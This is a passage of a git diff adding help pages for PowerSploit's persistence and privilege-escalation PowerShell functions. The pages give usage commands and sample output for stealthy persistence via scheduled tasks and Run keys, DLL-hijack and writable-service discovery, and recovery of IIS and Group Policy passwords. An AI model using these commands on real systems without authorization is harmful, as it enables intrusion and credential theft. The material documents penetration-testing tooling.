SwitchParameter +Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskAtLogon, ScheduledTaskHourly, ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Registry +Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. +Note: This option will briefly pop up a PowerShell console to the user. + +Detection Difficulty: Easy +Removal Difficulty: Easy +User Detectable? +Yes + +```yaml +Type: SwitchParameter +Parameter Sets: Registry +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Daily +Starts the payload daily. + +```yaml +Type: SwitchParameter +Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Hourly +Starts the payload hourly. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskHourly +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -At +Starts the payload at the specified time. +You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. + +```yaml +Type: DateTime +Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OnIdle +Starts the payload after one minute of idling. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskOnIdle +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AtLogon +Starts the payload upon any user logon. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskAtLogon, Registry +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AtStartup +Starts the payload within 240 and 325 seconds of computer startup. + +```yaml +Type: SwitchParameter +Parameter Sets: PermanentWMIAtStartup +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/Persistence/New-UserPersistenceOption.md b/docs/Persistence/New-UserPersistenceOption.md new file mode 100755 index 00000000..c7c020f0 --- /dev/null +++ b/docs/Persistence/New-UserPersistenceOption.md @@ -0,0 +1,179 @@ +# New-UserPersistenceOption + +## SYNOPSIS +Configure user-level persistence options for the Add-Persistence function. + +PowerSploit Function: New-UserPersistenceOption +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### ScheduledTaskOnIdle +``` +New-UserPersistenceOption [-ScheduledTask] [-OnIdle] +``` + +### ScheduledTaskHourly +``` +New-UserPersistenceOption [-ScheduledTask] [-Hourly] +``` + +### ScheduledTaskDaily +``` +New-UserPersistenceOption [-ScheduledTask] [-Daily] -At +``` + +### Registry +``` +New-UserPersistenceOption [-Registry] [-AtLogon] +``` + +## DESCRIPTION +New-UserPersistenceOption allows for the configuration of elevated persistence options. +The output of this function is a required parameter of Add-Persistence. +Available persitence options in order of stealth are the following: scheduled task, registry. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$UserOptions = New-UserPersistenceOption -Registry -AtLogon +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle +``` + +## PARAMETERS + +### -ScheduledTask +Persist via a scheduled task. + +Detection Difficulty: Moderate +Removal Difficulty: Moderate +User Detectable? +No + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskHourly, ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Registry +Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. +Note: This option will briefly pop up a PowerShell console to the user. + +Detection Difficulty: Easy +Removal Difficulty: Easy +User Detectable? +Yes + +```yaml +Type: SwitchParameter +Parameter Sets: Registry +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Daily +Starts the payload daily. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Hourly +Starts the payload hourly. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskHourly +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -At +Starts the payload at the specified time. +You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. + +```yaml +Type: DateTime +Parameter Sets: ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OnIdle +Starts the payload after one minute of idling. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskOnIdle +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AtLogon +Starts the payload upon any user logon. + +```yaml +Type: SwitchParameter +Parameter Sets: Registry +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/Privesc/Add-ServiceDacl.md b/docs/Privesc/Add-ServiceDacl.md new file mode 100755 index 00000000..13e4d64a --- /dev/null +++ b/docs/Privesc/Add-ServiceDacl.md @@ -0,0 +1,68 @@ +# Add-ServiceDacl + +## SYNOPSIS +Adds a Dacl field to a service object returned by Get-Service. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Add-ServiceDacl [-Name] +``` + +## DESCRIPTION +Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a +Dacl field to each object. +It does this by opening a handle with ReadControl for the +service with using the GetServiceHandle Win32 API call and then uses +QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Service | Add-ServiceDacl +``` + +Add Dacls for every service the current user can read. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service -Name VMTools | Add-ServiceDacl +``` + +Add the Dacl to the VMTools service object. + +## PARAMETERS + +### -Name +An array of one or more service names to add a service Dacl for. +Passable on the pipeline. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### ServiceProcess.ServiceController + +## NOTES + +## RELATED LINKS + +[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) + diff --git a/docs/Privesc/Enable-Privilege.md b/docs/Privesc/Enable-Privilege.md new file mode 100755 index 00000000..6de9c439 --- /dev/null +++ b/docs/Privesc/Enable-Privilege.md @@ -0,0 +1,105 @@ +# Enable-Privilege + +## SYNOPSIS +Enables a specific privilege for the current process. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Enable-Privilege [-Privilege] +``` + +## DESCRIPTION +Uses RtlAdjustPrivilege to enable a specific privilege for the current process. +Privileges can be passed by string, or the output from Get-ProcessTokenPrivilege +can be passed on the pipeline. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege DISABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +Enable-Privilege SeShutdownPrivilege + +Get-ProcessTokenPrivilege + + Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege SE_PRIVILEGE_ENABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId +--------- ---------- --------- +SeShutdownPrivilege DISABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege DISABLED 2828 +SeIncreaseWorkingSetPrivilege DISABLED 2828 +SeTimeZonePrivilege DISABLED 2828 + + +Get-ProcessTokenPrivilege | Enable-Privilege -Verbose +VERBOSE: Attempting to enable SeShutdownPrivilege +VERBOSE: Attempting to enable SeChangeNotifyPrivilege +VERBOSE: Attempting to enable SeUndockPrivilege +VERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege +VERBOSE: Attempting to enable SeTimeZonePrivilege + +Get-ProcessTokenPrivilege + +Privilege Attributes ProcessId +--------- ---------- --------- +SeShutdownPrivilege SE_PRIVILEGE_ENABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege SE_PRIVILEGE_ENABLED 2828 +SeIncreaseWorkingSetPrivilege SE_PRIVILEGE_ENABLED 2828 +SeTimeZonePrivilege SE_PRIVILEGE_ENABLED 2828 + +## PARAMETERS + +### -Privilege +{{Fill Privilege Description}} + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Privileges + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html](http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html) + diff --git a/docs/Privesc/Find-PathDLLHijack.md b/docs/Privesc/Find-PathDLLHijack.md new file mode 100755 index 00000000..f43fc692 --- /dev/null +++ b/docs/Privesc/Find-PathDLLHijack.md @@ -0,0 +1,45 @@ +# Find-PathDLLHijack + +## SYNOPSIS +Finds all directories in the system %PATH% that are modifiable by the current user. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Find-PathDLLHijack +``` + +## DESCRIPTION +Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath +to return the folder paths the current user can write to. +On Windows 7, if wlbsctrl.dll is +written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search +order loading. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-PathDLLHijack +``` + +Finds all %PATH% .DLL hijacking opportunities. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL.Path + +## NOTES + +## RELATED LINKS + +[http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738) + diff --git a/docs/Privesc/Find-ProcessDLLHijack.md b/docs/Privesc/Find-ProcessDLLHijack.md new file mode 100755 index 00000000..bbece58b --- /dev/null +++ b/docs/Privesc/Find-ProcessDLLHijack.md @@ -0,0 +1,127 @@ +# Find-ProcessDLLHijack + +## SYNOPSIS +Finds all DLL hijack locations for currently running processes. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Find-ProcessDLLHijack [[-Name] ] [-ExcludeWindows] [-ExcludeProgramFiles] [-ExcludeOwned] +``` + +## DESCRIPTION +Enumerates all currently running processes with Get-Process (or accepts an +input process object from Get-Process) and enumerates the loaded modules for each. +All loaded module name exists outside of the process binary base path, as those +are DLL load-order hijack candidates. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-ProcessDLLHijack +``` + +Finds possible hijackable DLL locations for all processes. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Process VulnProcess | Find-ProcessDLLHijack +``` + +Finds possible hijackable DLL locations for the 'VulnProcess' processes. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles +``` + +Finds possible hijackable DLL locations not in C:\Windows\* and +not in C:\Program Files\* or C:\Program Files (x86)\* + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Find-ProcessDLLHijack -ExcludeOwned +``` + +Finds possible hijackable DLL location for processes not owned by the +current user. + +## PARAMETERS + +### -Name +The name of a process to enumerate for possible DLL path hijack opportunities. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ProcessName + +Required: False +Position: 1 +Default value: $(Get-Process | Select-Object -Expand Name) +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ExcludeWindows +Exclude paths from C:\Windows\* instead of just C:\Windows\System32\* + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeProgramFiles +Exclude paths from C:\Program Files\* and C:\Program Files (x86)\* + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeOwned +Exclude processes the current user owns. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL.Process + +## NOTES + +## RELATED LINKS + +[https://www.mandiant.com/blog/malware-persistence-windows-registry/](https://www.mandiant.com/blog/malware-persistence-windows-registry/) + diff --git a/docs/Privesc/Get-ApplicationHost.md b/docs/Privesc/Get-ApplicationHost.md new file mode 100755 index 00000000..44d07d70 --- /dev/null +++ b/docs/Privesc/Get-ApplicationHost.md @@ -0,0 +1,95 @@ +# Get-ApplicationHost + +## SYNOPSIS +Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system. + +Author: Scott Sutherland +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ApplicationHost +``` + +## DESCRIPTION +This script will decrypt and recover application pool and virtual directory passwords +from the applicationHost.config file on the system. +The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Return application pool and virtual directory passwords from the applicationHost.config on the system. +``` + +Get-ApplicationHost + +user : PoolUser1 +pass : PoolParty1! +type : Application Pool +vdir : NA +apppool : ApplicationPool1 +user : PoolUser2 +pass : PoolParty2! +type : Application Pool +vdir : NA +apppool : ApplicationPool2 +user : VdirUser1 +pass : VdirPassword1! +type : Virtual Directory +vdir : site1/vdir1/ +apppool : NA +user : VdirUser2 +pass : VdirPassword2! +type : Virtual Directory +vdir : site2/ +apppool : NA + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Return a list of cleartext and decrypted connect strings from web.config files. +``` + +Get-ApplicationHost | Format-Table -Autosize + +user pass type vdir apppool +---- ---- ---- ---- ------- +PoolUser1 PoolParty1! +Application Pool NA ApplicationPool1 +PoolUser2 PoolParty2! +Application Pool NA ApplicationPool2 +VdirUser1 VdirPassword1! +Virtual Directory site1/vdir1/ NA +VdirUser2 VdirPassword2! +Virtual Directory site2/ NA + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Data.DataTable + +System.Boolean + +## NOTES +Author: Scott Sutherland - 2014, NetSPI +Version: Get-ApplicationHost v1.0 +Comments: Should work on IIS 6 and Above + +## RELATED LINKS + +[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx) + diff --git a/docs/Privesc/Get-CachedGPPPassword.md b/docs/Privesc/Get-CachedGPPPassword.md new file mode 100755 index 00000000..2169a150 --- /dev/null +++ b/docs/Privesc/Get-CachedGPPPassword.md @@ -0,0 +1,55 @@ +# Get-CachedGPPPassword + +## SYNOPSIS +Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and +left in cached files on the host. + +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-CachedGPPPassword +``` + +## DESCRIPTION +Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and +datasources.xml files and returns plaintext passwords. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-CachedGPPPassword +``` + +NewName : \[BLANK\] +Changed : {2013-04-25 18:36:07} +Passwords : {Super!!!Password} +UserNames : {SuperSecretBackdoor} +File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7 + C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr + oups.xml + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) + diff --git a/docs/Privesc/Get-ModifiablePath.md b/docs/Privesc/Get-ModifiablePath.md new file mode 100755 index 00000000..2a1118ff --- /dev/null +++ b/docs/Privesc/Get-ModifiablePath.md @@ -0,0 +1,102 @@ +# Get-ModifiablePath + +## SYNOPSIS +Parses a passed string containing multiple possible file/folder paths and returns +the file paths where the current user has modification rights. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ModifiablePath [-Path] [-Literal] +``` + +## DESCRIPTION +Takes a complex path specification of an initial file/folder path with possible +configuration files, 'tokenizes' the string in a number of possible ways, and +enumerates the ACLs for each path that currently exists on the system. +Any path that +the current user has modification rights on is returned in a custom object that contains +the modifiable path, associated permission set, and the IdentityReference with the specified +rights. +The SID of the current user and any group he/she are a part of are used as the +comparison set against the parsed path DACLs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +'"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath +``` + +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Temp\blah.exe {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +C:\Temp\config.ini {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath +``` + +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Vuln\blah.bat {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +C:\Vuln\config.ini {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +... + +## PARAMETERS + +### -Path +The string path to parse for modifiable files. +Required + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: FullName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Literal +Switch. +Treat all paths as literal (i.e. +don't do 'tokenization'). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: LiteralPaths + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenPrivilege.ModifiablePath + +Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for +a modifiable path. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableRegistryAutoRun.md b/docs/Privesc/Get-ModifiableRegistryAutoRun.md new file mode 100755 index 00000000..23314f9d --- /dev/null +++ b/docs/Privesc/Get-ModifiableRegistryAutoRun.md @@ -0,0 +1,44 @@ +# Get-ModifiableRegistryAutoRun + +## SYNOPSIS +Returns any elevated system autoruns in which the current user can +modify part of the path string. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableRegistryAutoRun +``` + +## DESCRIPTION +Enumerates a number of autorun specifications in HKLM and filters any +autoruns through Get-ModifiablePath, returning any file/config locations +in the found path strings that the current user can modify. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableRegistryAutoRun +``` + +Return vulneable autorun binaries (or associated configs). + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiableRegistryAutoRun + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableScheduledTaskFile.md b/docs/Privesc/Get-ModifiableScheduledTaskFile.md new file mode 100755 index 00000000..4e48cc43 --- /dev/null +++ b/docs/Privesc/Get-ModifiableScheduledTaskFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableScheduledTaskFile + +## SYNOPSIS +Returns scheduled tasks where the current user can modify any file +in the associated task action string. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableScheduledTaskFile +``` + +## DESCRIPTION +Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks" +and parses the XML specification for each task, extracting the command triggers. +Each trigger string is filtered through Get-ModifiablePath, returning any file/config +locations in the found path strings that the current user can modify. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableScheduledTaskFile +``` + +Return scheduled tasks with modifiable command strings. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiableScheduledTaskFile + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableService.md b/docs/Privesc/Get-ModifiableService.md new file mode 100755 index 00000000..92eeb81b --- /dev/null +++ b/docs/Privesc/Get-ModifiableService.md @@ -0,0 +1,40 @@ +# Get-ModifiableService + +## SYNOPSIS +Enumerates all services and returns services for which the current user can modify the binPath. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail + +## SYNTAX + +``` +Get-ModifiableService +``` + +## DESCRIPTION +Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if +the current user has rights to change the service configuration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableService +``` + +Get a set of potentially exploitable services. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiablePath + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableServiceFile.md b/docs/Privesc/Get-ModifiableServiceFile.md new file mode 100755 index 00000000..ab01e42d --- /dev/null +++ b/docs/Privesc/Get-ModifiableServiceFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableServiceFile + +## SYNOPSIS +Enumerates all services and returns vulnerable service files. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableServiceFile +``` + +## DESCRIPTION +Enumerates all services by querying the WMI win32_service class. +For each service, +it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine +if the current user has rights to modify the service binary itself or any associated +arguments. +If the associated binary (or any configuration files) can be overwritten, +privileges may be able to be escalated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableServiceFile +``` + +Get a set of potentially exploitable service binares/config files. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiablePath + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ProcessTokenGroup.md b/docs/Privesc/Get-ProcessTokenGroup.md new file mode 100755 index 00000000..e52533c7 --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenGroup.md @@ -0,0 +1,114 @@ +# Get-ProcessTokenGroup + +## SYNOPSIS +Returns all SIDs that the current token context is a part of, whether they are disabled or not. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation + +## SYNTAX + +``` +Get-ProcessTokenGroup [[-Id] ] +``` + +## DESCRIPTION +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. +The token +is then passed to Get-TokenInformation to query the current token groups for the specified +token. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenGroup +``` + +SID Attributes ProcessId +--- ---------- --------- +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 1372 +S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 1372 +S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-16-8192 1372 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Process notepad | Get-ProcessTokenGroup +``` + +SID Attributes ProcessId +--- ---------- --------- +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 2640 +S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 2640 +S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-16-8192 2640 + +## PARAMETERS + +### -Id +The process ID to enumerate token groups for, otherwise defaults to the current process. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: ProcessID + +Required: False +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenGroup + +Outputs a custom object containing the token group (SID/attributes) for the specified token if +"-InformationClass 'Groups'" is passed. + +PowerUp.TokenPrivilege + +Outputs a custom object containing the token privilege (name/attributes) for the specified token if +"-InformationClass 'Privileges'" is passed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ProcessTokenPrivilege.md b/docs/Privesc/Get-ProcessTokenPrivilege.md new file mode 100755 index 00000000..9f835f2c --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenPrivilege.md @@ -0,0 +1,131 @@ +# Get-ProcessTokenPrivilege + +## SYNOPSIS +Returns all privileges for the current (or specified) process ID. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation + +## SYNTAX + +``` +Get-ProcessTokenPrivilege [[-Id] ] [-Special] +``` + +## DESCRIPTION +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. +The token +is then passed to Get-TokenInformation to query the current privileges for the specified +token. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege DISABLED 2600 + 